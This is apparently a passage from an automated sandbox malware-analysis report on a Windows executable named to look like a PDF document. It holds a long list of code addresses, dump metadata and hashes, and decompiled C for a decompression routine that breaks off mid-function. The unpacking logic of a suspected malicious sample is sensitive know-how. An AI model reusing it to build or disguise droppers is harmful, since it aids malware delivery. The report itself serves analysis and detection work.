                                                                      0x004067fc
                                                                      0x00000000
                                                                      0x00406819
                                                                      0x00406819
                                                                      0x0040681d
                                                                      0x004070c9
                                                                      0x004070c9
                                                                      0x00000000
                                                                      0x004070c9
                                                                      0x00406823
                                                                      0x00406826
                                                                      0x00406836
                                                                      0x00406839
                                                                      0x0040683c
                                                                      0x0040683c
                                                                      0x0040683c
                                                                      0x0040683f
                                                                      0x00406843
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x00406845
                                                                      0x00406845
                                                                      0x0040684b
                                                                      0x00406875
                                                                      0x0040687b
                                                                      0x00406882
                                                                      0x00000000
                                                                      0x00406882
                                                                      0x0040684d
                                                                      0x00406851
                                                                      0x00406854
                                                                      0x00406859
                                                                      0x00406859
                                                                      0x00406864
                                                                      0x0040686c
                                                                      0x0040686f
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x004068b4
                                                                      0x004068ba
                                                                      0x004068bd
                                                                      0x004068ca
                                                                      0x004068d2
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x00406889
                                                                      0x00406889
                                                                      0x0040688d
                                                                      0x004070d8
                                                                      0x004070d8
                                                                      0x00000000
                                                                      0x004070d8
                                                                      0x00406893
                                                                      0x00406899
                                                                      0x004068a4
                                                                      0x004068a4
                                                                      0x004068a4
                                                                      0x004068a7
                                                                      0x004068aa
                                                                      0x004068ad
                                                                      0x004068b2
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x00406f49
                                                                      0x00406f49
                                                                      0x00406f4f
                                                                      0x00406f55
                                                                      0x00406f5b
                                                                      0x00406f75
                                                                      0x00406f78
                                                                      0x00406f7e
                                                                      0x00406f89
                                                                      0x00406f89
                                                                      0x00406f8b
                                                                      0x00406f5d
                                                                      0x00406f5d
                                                                      0x00406f6c
                                                                      0x00406f70
                                                                      0x00406f70
                                                                      0x00406f95
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x00406f97
                                                                      0x00406f9b
                                                                      0x0040714a
                                                                      0x0040714a
                                                                      0x00000000
                                                                      0x0040714a
                                                                      0x00406fa1
                                                                      0x00406fa7
                                                                      0x00406fae
                                                                      0x00406fb6
                                                                      0x00406fb9
                                                                      0x00406fbc
                                                                      0x00406fbc
                                                                      0x00406fc2
                                                                      0x00406fc2
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x004068da
                                                                      0x004068da
                                                                      0x004068dc
                                                                      0x004068df
                                                                      0x00406950
                                                                      0x00406950
                                                                      0x00406953
                                                                      0x00406956
                                                                      0x0040695d
                                                                      0x00406967
                                                                      0x00000000
                                                                      0x00406967
                                                                      0x004068e1
                                                                      0x004068e1
                                                                      0x004068e5
                                                                      0x004068e8
                                                                      0x004068ea
                                                                      0x004068ed
                                                                      0x004068f0
                                                                      0x004068f2
                                                                      0x004068f5
                                                                      0x004068f7
                                                                      0x004068fc
                                                                      0x004068ff
                                                                      0x00406902
                                                                      0x00406906
                                                                      0x0040690d
                                                                      0x00406910
                                                                      0x00406917
                                                                      0x0040691b
                                                                      0x00406923
                                                                      0x00406923
                                                                      0x00406923
                                                                      0x0040691d
                                                                      0x0040691d
                                                                      0x0040691d
                                                                      0x00406912
                                                                      0x00406912
                                                                      0x00406912
                                                                      0x00406927
                                                                      0x0040692a
                                                                      0x00406948
                                                                      0x00406948
                                                                      0x0040694a
                                                                      0x00000000
                                                                      0x0040692c
                                                                      0x0040692c
                                                                      0x0040692c
                                                                      0x0040692f
                                                                      0x00406932
                                                                      0x00406935
                                                                      0x00406937
                                                                      0x00406937
                                                                      0x00406937
                                                                      0x0040693a
                                                                      0x0040693d
                                                                      0x0040693f
                                                                      0x00406940
                                                                      0x00406943
                                                                      0x00000000
                                                                      0x00406943
                                                                      0x00000000
                                                                      0x00406b79
                                                                      0x00406b79
                                                                      0x00406b7d
                                                                      0x00406b9b
                                                                      0x00406b9b
                                                                      0x00406b9e
                                                                      0x00406ba5
                                                                      0x00406ba8
                                                                      0x00406bab
                                                                      0x00406bae
                                                                      0x00406bb1
                                                                      0x00406bb4
                                                                      0x00406bb6
                                                                      0x00406bbd
                                                                      0x00406bbe
                                                                      0x00406bc0
                                                                      0x00406bc3
                                                                      0x00406bc6
                                                                      0x00406bc9
                                                                      0x00406bc9
                                                                      0x00406bce
                                                                      0x00000000
                                                                      0x00406bce
                                                                      0x00406b7f
                                                                      0x00406b7f
                                                                      0x00406b82
                                                                      0x00406b85
                                                                      0x00406b8f
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x00406be3
                                                                      0x00406be3
                                                                      0x00406be7
                                                                      0x00406c0a
                                                                      0x00406c0d
                                                                      0x00406c10
                                                                      0x00406c1a
                                                                      0x00406be9
                                                                      0x00406be9
                                                                      0x00406bec
                                                                      0x00406bef
                                                                      0x00406bf2
                                                                      0x00406bff
                                                                      0x00406c02
                                                                      0x00406c02
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x00406c26
                                                                      0x00406c26
                                                                      0x00406c2a
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x00406c30
                                                                      0x00406c30
                                                                      0x00406c34
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x00406c3a
                                                                      0x00406c3a
                                                                      0x00406c3c
                                                                      0x00406c40
                                                                      0x00406c40
                                                                      0x00406c43
                                                                      0x00406c47
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x00406c97
                                                                      0x00406c97
                                                                      0x00406c9b
                                                                      0x00406ca2
                                                                      0x00406ca2
                                                                      0x00406ca5
                                                                      0x00406ca8
                                                                      0x00406cb2
                                                                      0x00000000
                                                                      0x00406cb2
                                                                      0x00406c9d
                                                                      0x00406c9d
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x00406cbe
                                                                      0x00406cbe
                                                                      0x00406cc2
                                                                      0x00406cc9
                                                                      0x00406ccc
                                                                      0x00406ccf
                                                                      0x00406cc4
                                                                      0x00406cc4
                                                                      0x00406cc4
                                                                      0x00406cd2
                                                                      0x00406cd5
                                                                      0x00406cd8
                                                                      0x00406cd8
                                                                      0x00406cdb
                                                                      0x00406cde
                                                                      0x00406ce1
                                                                      0x00406ce1
                                                                      0x00406ce4
                                                                      0x00406ceb
                                                                      0x00406cf0
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x00406d7e
                                                                      0x00406d7e
                                                                      0x00406d82
                                                                      0x00407120
                                                                      0x00407120
                                                                      0x00000000
                                                                      0x00407120
                                                                      0x00406d88
                                                                      0x00406d88
                                                                      0x00406d8b
                                                                      0x00406d8e
                                                                      0x00406d92
                                                                      0x00406d95
                                                                      0x00406d9b
                                                                      0x00406d9d
                                                                      0x00406d9d
                                                                      0x00406d9d
                                                                      0x00406da0
                                                                      0x00406da3
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x00406973
                                                                      0x00406973
                                                                      0x00406977
                                                                      0x004070e4
                                                                      0x004070e4
                                                                      0x00000000
                                                                      0x004070e4
                                                                      0x0040697d
                                                                      0x0040697d
                                                                      0x00406980
                                                                      0x00406983
                                                                      0x00406987
                                                                      0x0040698a
                                                                      0x00406990
                                                                      0x00406992
                                                                      0x00406992
                                                                      0x00406992
                                                                      0x00406995
                                                                      0x00406998
                                                                      0x00406998
                                                                      0x0040699b
                                                                      0x0040699e
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x004069a4
                                                                      0x004069a4
                                                                      0x004069aa
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x004069b0
                                                                      0x004069b0
                                                                      0x004069b4
                                                                      0x004069b7
                                                                      0x004069ba
                                                                      0x004069bd
                                                                      0x004069c0
                                                                      0x004069c1
                                                                      0x004069c4
                                                                      0x004069c6
                                                                      0x004069cc
                                                                      0x004069cf
                                                                      0x004069d2
                                                                      0x004069d5
                                                                      0x004069d8
                                                                      0x004069db
                                                                      0x004069de
                                                                      0x004069fa
                                                                      0x004069fd
                                                                      0x00406a00
                                                                      0x00406a03
                                                                      0x00406a0a
                                                                      0x00406a0e
                                                                      0x00406a10
                                                                      0x00406a14
                                                                      0x004069e0
                                                                      0x004069e0
                                                                      0x004069e4
                                                                      0x004069ec
                                                                      0x004069f1
                                                                      0x004069f3
                                                                      0x004069f5
                                                                      0x004069f5
                                                                      0x00406a17
                                                                      0x00406a1e
                                                                      0x00406a21
                                                                      0x00000000
                                                                      0x00406a27
                                                                      0x00406a27
                                                                      0x00000000
                                                                      0x00406a27
                                                                      0x00000000
                                                                      0x00406a2c
                                                                      0x00406a2c
                                                                      0x00406a30
                                                                      0x004070f0
                                                                      0x004070f0
                                                                      0x00000000
                                                                      0x004070f0
                                                                      0x00406a36
                                                                      0x00406a36
                                                                      0x00406a39
                                                                      0x00406a3c
                                                                      0x00406a40
                                                                      0x00406a43
                                                                      0x00406a49
                                                                      0x00406a4b
                                                                      0x00406a4b
                                                                      0x00406a4b
                                                                      0x00406a4e
                                                                      0x00406a51
                                                                      0x00406a51
                                                                      0x00406a51
                                                                      0x00406a57
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x00406a59
                                                                      0x00406a59
                                                                      0x00406a5c
                                                                      0x00406a5f
                                                                      0x00406a62
                                                                      0x00406a65
                                                                      0x00406a68
                                                                      0x00406a6b
                                                                      0x00406a6e
                                                                      0x00406a71
                                                                      0x00406a74
                                                                      0x00406a77
                                                                      0x00406a8f
                                                                      0x00406a92
                                                                      0x00406a95
                                                                      0x00406a98
                                                                      0x00406a9b
                                                                      0x00406a9f
                                                                      0x00406aa1
                                                                      0x00406a79
                                                                      0x00406a79
                                                                      0x00406a81
                                                                      0x00406a86
                                                                      0x00406a88
                                                                      0x00406a8a
                                                                      0x00406a8a
                                                                      0x00406aa4
                                                                      0x00406aab
                                                                      0x00406aae
                                                                      0x00000000
                                                                      0x00406ab0
                                                                      0x00406ab0
                                                                      0x00000000
                                                                      0x00406ab0
                                                                      0x00406aae
                                                                      0x00406ab5
                                                                      0x00406ab5
                                                                      0x00406ab5
                                                                      0x00406ab5
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x00406af0
                                                                      0x00406af0
                                                                      0x00406af4
                                                                      0x004070fc
                                                                      0x004070fc
                                                                      0x00000000
                                                                      0x004070fc
                                                                      0x00406afa
                                                                      0x00406afa
                                                                      0x00406afd
                                                                      0x00406b00
                                                                      0x00406b04
                                                                      0x00406b07
                                                                      0x00406b0d
                                                                      0x00406b0f
                                                                      0x00406b0f
                                                                      0x00406b0f
                                                                      0x00406b12
                                                                      0x00406b15
                                                                      0x00406b15
                                                                      0x00406b1b
                                                                      0x00406ab9
                                                                      0x00406ab9
                                                                      0x00406abc
                                                                      0x00000000
                                                                      0x00406abc
                                                                      0x00406b1d
                                                                      0x00406b1d
                                                                      0x00406b20
                                                                      0x00406b23
                                                                      0x00406b26
                                                                      0x00406b29
                                                                      0x00406b2c
                                                                      0x00406b2f
                                                                      0x00406b32
                                                                      0x00406b35
                                                                      0x00406b38
                                                                      0x00406b3b
                                                                      0x00406b53
                                                                      0x00406b56
                                                                      0x00406b59
                                                                      0x00406b5c
                                                                      0x00406b5f
                                                                      0x00406b63
                                                                      0x00406b65
                                                                      0x00406b3d
                                                                      0x00406b3d
                                                                      0x00406b45
                                                                      0x00406b4a
                                                                      0x00406b4c
                                                                      0x00406b4e
                                                                      0x00406b4e
                                                                      0x00406b68
                                                                      0x00406b6f
                                                                      0x00406b72
                                                                      0x00000000
                                                                      0x00406b74
                                                                      0x00406b74
                                                                      0x00000000
                                                                      0x00406b74
                                                                      0x00000000
                                                                      0x00406e01
                                                                      0x00406e01
                                                                      0x00406e05
                                                                      0x0040712c
                                                                      0x0040712c
                                                                      0x00000000
                                                                      0x0040712c
                                                                      0x00406e0b
                                                                      0x00406e0b
                                                                      0x00406e0e
                                                                      0x00406e11
                                                                      0x00406e15
                                                                      0x00406e18
                                                                      0x00406e1e
                                                                      0x00406e20
                                                                      0x00406e20
                                                                      0x00406e20
                                                                      0x00406e23
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x00406bd1
                                                                      0x00406bd1
                                                                      0x00406bd4
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x00406f10
                                                                      0x00406f10
                                                                      0x00406f14
                                                                      0x00406f36
                                                                      0x00406f36
                                                                      0x00406f39
                                                                      0x00406f43
                                                                      0x00406f46
                                                                      0x00406f46
                                                                      0x00000000
                                                                      0x00406f46
                                                                      0x00406f16
                                                                      0x00406f16
                                                                      0x00406f19
                                                                      0x00406f1d
                                                                      0x00406f20
                                                                      0x00406f20
                                                                      0x00406f23
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x00406fcd
                                                                      0x00406fcd
                                                                      0x00406fd1
                                                                      0x00406fef
                                                                      0x00406fef
                                                                      0x00406fef
                                                                      0x00406fef
                                                                      0x00406ff6
                                                                      0x00406ffd
                                                                      0x00407004
                                                                      0x00407004
                                                                      0x0040700b
                                                                      0x0040700e
                                                                      0x00407015
                                                                      0x00000000
                                                                      0x00407018
                                                                      0x00406fd3
                                                                      0x00406fd3
                                                                      0x00406fd6
                                                                      0x00406fd9
                                                                      0x00406fdc
                                                                      0x00406fe3
                                                                      0x00406f27
                                                                      0x00406f27
                                                                      0x00406f2a
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x004070be
                                                                      0x004070be
                                                                      0x004070c1
                                                                      0x00406fc2
                                                                      0x00406fc2
                                                                      0x00406fc2
                                                                      0x00000000
                                                                      0x00406fc8
                                                                      0x00000000
                                                                      0x00406cf8
                                                                      0x00406cf8
                                                                      0x00406cfa
                                                                      0x00406d01
                                                                      0x00406d02
                                                                      0x00406d04
                                                                      0x00406d07
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x0040700b
                                                                      0x0040700b
                                                                      0x0040700e
                                                                      0x00407015
                                                                      0x00000000
                                                                      0x00407018
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x00406d3d
                                                                      0x00406d3d
                                                                      0x00406d40
                                                                      0x00406d76
                                                                      0x00406d76
                                                                      0x00406ea6
                                                                      0x00406ea6
                                                                      0x00406ea6
                                                                      0x00406ea6
                                                                      0x00406ea9
                                                                      0x00406ea9
                                                                      0x00406eac
                                                                      0x00406eae
                                                                      0x00407138
                                                                      0x00407138
                                                                      0x00000000
                                                                      0x00407138
                                                                      0x00406eb4
                                                                      0x00406eb4
                                                                      0x00406eb7
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x00406ebd
                                                                      0x00406ebd
                                                                      0x00406ec1
                                                                      0x00406ec4
                                                                      0x00406ec4
                                                                      0x00406ec4
                                                                      0x00000000
                                                                      0x00406ec4
                                                                      0x00406d42
                                                                      0x00406d42
                                                                      0x00406d44
                                                                      0x00406d46
                                                                      0x00406d48
                                                                      0x00406d4b
                                                                      0x00406d4c
                                                                      0x00406d4e
                                                                      0x00406d50
                                                                      0x00406d53
                                                                      0x00406d56
                                                                      0x00406d6c
                                                                      0x00406d6c
                                                                      0x00406d71
                                                                      0x00406da9
                                                                      0x00406da9
                                                                      0x00406dad
                                                                      0x00406dd6
                                                                      0x00406dd9
                                                                      0x00406ddb
                                                                      0x00406de2
                                                                      0x00406de5
                                                                      0x00406de8
                                                                      0x00406de8
                                                                      0x00406ded
                                                                      0x00406ded
                                                                      0x00406def
                                                                      0x00406df2
                                                                      0x00406df9
                                                                      0x00406dfc
                                                                      0x00406e29
                                                                      0x00406e29
                                                                      0x00406e2c
                                                                      0x00406e2f
                                                                      0x00406ea3
                                                                      0x00406ea3
                                                                      0x00406ea3
                                                                      0x00406ea3
                                                                      0x00000000
                                                                      0x00406ea3
                                                                      0x00406e31
                                                                      0x00406e31
                                                                      0x00406e37
                                                                      0x00406e3a
                                                                      0x00406e3d
                                                                      0x00406e40
                                                                      0x00406e43
                                                                      0x00406e46
                                                                      0x00406e49
                                                                      0x00406e4c
                                                                      0x00406e4f
                                                                      0x00406e52
                                                                      0x00406e6b
                                                                      0x00406e6d
                                                                      0x00406e70
                                                                      0x00406e71
                                                                      0x00406e74
                                                                      0x00406e76
                                                                      0x00406e79
                                                                      0x00406e7b
                                                                      0x00406e7d
                                                                      0x00406e80
                                                                      0x00406e82
                                                                      0x00406e85
                                                                      0x00406e89
                                                                      0x00406e8b
                                                                      0x00406e8b
                                                                      0x00406e8c
                                                                      0x00406e8f
                                                                      0x00406e92
                                                                      0x00406e54
                                                                      0x00406e54
                                                                      0x00406e5c
                                                                      0x00406e61
                                                                      0x00406e63
                                                                      0x00406e66
                                                                      0x00406e66
                                                                      0x00406e95
                                                                      0x00406e9c
                                                                      0x00406e26
                                                                      0x00406e26
                                                                      0x00406e26
                                                                      0x00406e26
                                                                      0x00000000
                                                                      0x00406e9e
                                                                      0x00406e9e
                                                                      0x00000000
                                                                      0x00406e9e
                                                                      0x00406e9c
                                                                      0x00406daf
                                                                      0x00406daf
                                                                      0x00406db2
                                                                      0x00406db4
                                                                      0x00406db7
                                                                      0x00406dba
                                                                      0x00406dbd
                                                                      0x00406dbf
                                                                      0x00406dc2
                                                                      0x00406dc5
                                                                      0x00406dc5
                                                                      0x00406dc8
                                                                      0x00406dc8
                                                                      0x00406dcb
                                                                      0x00406dd2
                                                                      0x00406da6
                                                                      0x00406da6
                                                                      0x00406da6
                                                                      0x00406da6
                                                                      0x00000000
                                                                      0x00406dd4
                                                                      0x00406dd4
                                                                      0x00000000
                                                                      0x00406dd4
                                                                      0x00406dd2
                                                                      0x00406d58
                                                                      0x00406d58
                                                                      0x00406d5b
                                                                      0x00406d5d
                                                                      0x00406d60
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x00406abf
                                                                      0x00406abf
                                                                      0x00406ac3
                                                                      0x00407108
                                                                      0x00407108
                                                                      0x00000000
                                                                      0x00407108
                                                                      0x00406ac9
                                                                      0x00406ac9
                                                                      0x00406acc
                                                                      0x00406acf
                                                                      0x00406ad2
                                                                      0x00406ad5
                                                                      0x00406ad8
                                                                      0x00406adb
                                                                      0x00406add
                                                                      0x00406ae0
                                                                      0x00406ae3
                                                                      0x00406ae6
                                                                      0x00406ae8
                                                                      0x00406ae8
                                                                      0x00406ae8
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x00406c4a
                                                                      0x00406c4a
                                                                      0x00406c4e
                                                                      0x00407114
                                                                      0x00407114
                                                                      0x00000000
                                                                      0x00407114
                                                                      0x00406c54
                                                                      0x00406c54
                                                                      0x00406c57
                                                                      0x00406c5a
                                                                      0x00406c5d
                                                                      0x00406c5f
                                                                      0x00406c5f
                                                                      0x00406c5f
                                                                      0x00406c62
                                                                      0x00406c65
                                                                      0x00406c68
                                                                      0x00406c6b
                                                                      0x00406c6e
                                                                      0x00406c71
                                                                      0x00406c72
                                                                      0x00406c74
                                                                      0x00406c74
                                                                      0x00406c74
                                                                      0x00406c77
                                                                      0x00406c7a
                                                                      0x00406c7d
                                                                      0x00406c80
                                                                      0x00406c80
                                                                      0x00406c80
                                                                      0x00406c83
                                                                      0x00406c85
                                                                      0x00406c85
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x00406ec7
                                                                      0x00406ec7
                                                                      0x00406ec7
                                                                      0x00406ecb
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x00406ed1
                                                                      0x00406ed1
                                                                      0x00406ed4
                                                                      0x00406ed7
                                                                      0x00406eda
                                                                      0x00406edc
                                                                      0x00406edc
                                                                      0x00406edc
                                                                      0x00406edf
                                                                      0x00406ee2
                                                                      0x00406ee5
                                                                      0x00406ee8
                                                                      0x00406eeb
                                                                      0x00406eee
                                                                      0x00406eef
                                                                      0x00406ef1
                                                                      0x00406ef1
                                                                      0x00406ef1
                                                                      0x00406ef4
                                                                      0x00406ef7
                                                                      0x00406efa
                                                                      0x00406efd
                                                                      0x00406f00
                                                                      0x00406f04
                                                                      0x00406f06
                                                                      0x00406f09
                                                                      0x00000000
                                                                      0x00406f0b
                                                                      0x00406f0b
                                                                      0x00406c88
                                                                      0x00406c88
                                                                      0x00000000
                                                                      0x00406c88
                                                                      0x00406f09
                                                                      0x0040713e
                                                                      0x0040713e
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x0040676d
                                                                      0x00407175
                                                                      0x00407175
                                                                      0x00000000
                                                                      0x00407175
                                                                      0x00406fc2
                                                                      0x00407042
                                                                      0x0040700b

                                                                      Memory Dump Source
                                                                      • Source File: 00000002.00000002.167508240401.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                      • Associated: 00000002.00000002.167508184127.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000002.00000002.167508327237.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000002.00000002.167508358463.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000002.00000002.167508358463.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000002.00000002.167508358463.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000002.00000002.167508358463.000000000042D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000002.00000002.167508358463.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000002.00000002.167508358463.0000000000464000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000002.00000002.167508702241.0000000000468000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_2_2_400000_DPR602859651100125001V1100125154830E 3-2-2023#U00b7pdf.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: c054bf0c5d93fa0a7b6250bc48fdf5a8ef487737ec2afd77fa79e2fd840b2821
                                                                      • Instruction ID: ad0bcc128236992ad7a4f6733702d2b43af4dc4d223e88fe38095793509b9f66
                                                                      • Opcode Fuzzy Hash: c054bf0c5d93fa0a7b6250bc48fdf5a8ef487737ec2afd77fa79e2fd840b2821
                                                                      • Instruction Fuzzy Hash: 62A15671D04229CBDF28CFA8C854AADBBB1FF44305F14816ED856BB281C7785986CF45
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 00406F10 Relevance: 5.2, APIs: 4, Instructions: 208COMMON
                                                                      Download Yara Rule
                                                                      C-Code - Quality: 98%
                                                                      			E00406F10() {
				void _t533;
				signed int _t534;
				signed int _t535;
				signed int* _t605;
				void* _t612;

				L0:
				while(1) {
					L0:
					if( *(_t612 - 0x40) != 0) {
						 *(_t612 - 0x84) = 0x13;
						_t605 =  *((intOrPtr*)(_t612 - 0x58)) + 2;
						goto L132;
					} else {
						__eax =  *(__ebp - 0x4c);
						 *(__ebp - 0x30) =  *(__ebp - 0x30) & 0x00000000;
						__ecx =  *(__ebp - 0x58);
						__eax =  *(__ebp - 0x4c) << 4;
						__eax =  *(__ebp - 0x58) + __eax + 4;
						L130:
						 *(__ebp - 0x58) = __eax;
						 *(__ebp - 0x40) = 3;
						L144:
						 *(__ebp - 0x7c) = 0x14;
						L145:
						__eax =  *(__ebp - 0x40);
						 *(__ebp - 0x50) = 1;
						 *(__ebp - 0x48) =  *(__ebp - 0x40);
						L149:
						if( *(__ebp - 0x48) <= 0) {
							__ecx =  *(__ebp - 0x40);
							__ebx =  *(__ebp - 0x50);
							0 = 1;
							__eax = 1 << __cl;
							__ebx =  *(__ebp - 0x50) - (1 << __cl);
							__eax =  *(__ebp - 0x7c);
							 *(__ebp - 0x44) = __ebx;
							while(1) {
								L140:
								 *(_t612 - 0x88) = _t533;
								while(1) {
									L1:
									_t534 =  *(_t612 - 0x88);
									if(_t534 > 0x1c) {
										break;
									}
									switch( *((intOrPtr*)(_t534 * 4 +  &M0040717D))) {
										case 0:
											if( *(_t612 - 0x6c) == 0) {
												goto L170;
											}
											 *(_t612 - 0x6c) =  *(_t612 - 0x6c) - 1;
											 *(_t612 - 0x70) =  &(( *(_t612 - 0x70))[1]);
											_t534 =  *( *(_t612 - 0x70));
											if(_t534 > 0xe1) {
												goto L171;
											}
											_t538 = _t534 & 0x000000ff;
											_push(0x2d);
											asm("cdq");
											_pop(_t569);
											_push(9);
											_pop(_t570);
											_t608 = _t538 / _t569;
											_t540 = _t538 % _t569 & 0x000000ff;
											asm("cdq");
											_t603 = _t540 % _t570 & 0x000000ff;
											 *(_t612 - 0x3c) = _t603;
											 *(_t612 - 0x1c) = (1 << _t608) - 1;
											 *((intOrPtr*)(_t612 - 0x18)) = (1 << _t540 / _t570) - 1;
											_t611 = (0x300 << _t603 + _t608) + 0x736;
											if(0x600 ==  *((intOrPtr*)(_t612 - 0x78))) {
												L10:
												if(_t611 == 0) {
													L12:
													 *(_t612 - 0x48) =  *(_t612 - 0x48) & 0x00000000;
													 *(_t612 - 0x40) =  *(_t612 - 0x40) & 0x00000000;
													goto L15;
												} else {
													goto L11;
												}
												do {
													L11:
													_t611 = _t611 - 1;
													 *((short*)( *(_t612 - 4) + _t611 * 2)) = 0x400;
												} while (_t611 != 0);
												goto L12;
											}
											if( *(_t612 - 4) != 0) {
												GlobalFree( *(_t612 - 4));
											}
											_t534 = GlobalAlloc(0x40, 0x600); // executed
											 *(_t612 - 4) = _t534;
											if(_t534 == 0) {
												goto L171;
											} else {
												 *((intOrPtr*)(_t612 - 0x78)) = 0x600;
												goto L10;
											}
										case 1:
											L13:
											__eflags =  *(_t612 - 0x6c);
											if( *(_t612 - 0x6c) == 0) {
												 *(_t612 - 0x88) = 1;
												goto L170;
											}
											 *(_t612 - 0x6c) =  *(_t612 - 0x6c) - 1;
											 *(_t612 - 0x40) =  *(_t612 - 0x40) | ( *( *(_t612 - 0x70)) & 0x000000ff) <<  *(_t612 - 0x48) << 0x00000003;
											 *(_t612 - 0x70) =  &(( *(_t612 - 0x70))[1]);
											_t45 = _t612 - 0x48;
											 *_t45 =  *(_t612 - 0x48) + 1;
											__eflags =  *_t45;
											L15:
											if( *(_t612 - 0x48) < 4) {
												goto L13;
											}
											_t546 =  *(_t612 - 0x40);
											if(_t546 ==  *(_t612 - 0x74)) {
												L20:
												 *(_t612 - 0x48) = 5;
												 *( *(_t612 - 8) +  *(_t612 - 0x74) - 1) =  *( *(_t612 - 8) +  *(_t612 - 0x74) - 1) & 0x00000000;
												goto L23;
											}
											 *(_t612 - 0x74) = _t546;
											if( *(_t612 - 8) != 0) {
												GlobalFree( *(_t612 - 8));
											}
											_t534 = GlobalAlloc(0x40,  *(_t612 - 0x40)); // executed
											 *(_t612 - 8) = _t534;
											if(_t534 == 0) {
												goto L171;
											} else {
												goto L20;
											}
										case 2:
											L24:
											_t553 =  *(_t612 - 0x60) &  *(_t612 - 0x1c);
											 *(_t612 - 0x84) = 6;
											 *(_t612 - 0x4c) = _t553;
											_t605 =  *(_t612 - 4) + (( *(_t612 - 0x38) << 4) + _t553) * 2;
											goto L132;
										case 3:
											L21:
											__eflags =  *(_t612 - 0x6c);
											if( *(_t612 - 0x6c) == 0) {
												 *(_t612 - 0x88) = 3;
												goto L170;
											}
											 *(_t612 - 0x6c) =  *(_t612 - 0x6c) - 1;
											_t67 = _t612 - 0x70;
											 *_t67 =  &(( *(_t612 - 0x70))[1]);
											__eflags =  *_t67;
											 *(_t612 - 0xc) =  *(_t612 - 0xc) << 0x00000008 |  *( *(_t612 - 0x70)) & 0x000000ff;
											L23:
											 *(_t612 - 0x48) =  *(_t612 - 0x48) - 1;
											if( *(_t612 - 0x48) != 0) {
												goto L21;
											}
											goto L24;
										case 4:
											L133:
											_t531 =  *_t605;
											_t588 = _t531 & 0x0000ffff;
											_t564 = ( *(_t612 - 0x10) >> 0xb) * _t588;
											if( *(_t612 - 0xc) >= _t564) {
												 *(_t612 - 0x10) =  *(_t612 - 0x10) - _t564;
												 *(_t612 - 0xc) =  *(_t612 - 0xc) - _t564;
												 *(_t612 - 0x40) = 1;
												_t532 = _t531 - (_t531 >> 5);
												__eflags = _t532;
												 *_t605 = _t532;
											} else {
												 *(_t612 - 0x10) = _t564;
												 *(_t612 - 0x40) =  *(_t612 - 0x40) & 0x00000000;
												 *_t605 = (0x800 - _t588 >> 5) + _t531;
											}
											if( *(_t612 - 0x10) >= 0x1000000) {
												goto L139;
											} else {
												goto L137;
											}
										case 5:
											L137:
											if( *(_t612 - 0x6c) == 0) {
												 *(_t612 - 0x88) = 5;
												goto L170;
											}
											 *(_t612 - 0x10) =  *(_t612 - 0x10) << 8;
											 *(_t612 - 0x6c) =  *(_t612 - 0x6c) - 1;
											 *(_t612 - 0x70) =  &(( *(_t612 - 0x70))[1]);
											 *(_t612 - 0xc) =  *(_t612 - 0xc) << 0x00000008 |  *( *(_t612 - 0x70)) & 0x000000ff;
											L139:
											_t533 =  *(_t612 - 0x84);
											goto L140;
										case 6:
											__edx = 0;
											__eflags =  *(__ebp - 0x40);
											if( *(__ebp - 0x40) != 0) {
												__eax =  *(__ebp - 4);
												__ecx =  *(__ebp - 0x38);
												 *(__ebp - 0x34) = 1;
												 *(__ebp - 0x84) = 7;
												__esi =  *(__ebp - 4) + 0x180 +  *(__ebp - 0x38) * 2;
												goto L132;
											}
											__eax =  *(__ebp - 0x5c) & 0x000000ff;
											__esi =  *(__ebp - 0x60);
											__cl = 8;
											__cl = 8 -  *(__ebp - 0x3c);
											__esi =  *(__ebp - 0x60) &  *(__ebp - 0x18);
											__eax = ( *(__ebp - 0x5c) & 0x000000ff) >> 8;
											__ecx =  *(__ebp - 0x3c);
											__esi = ( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8;
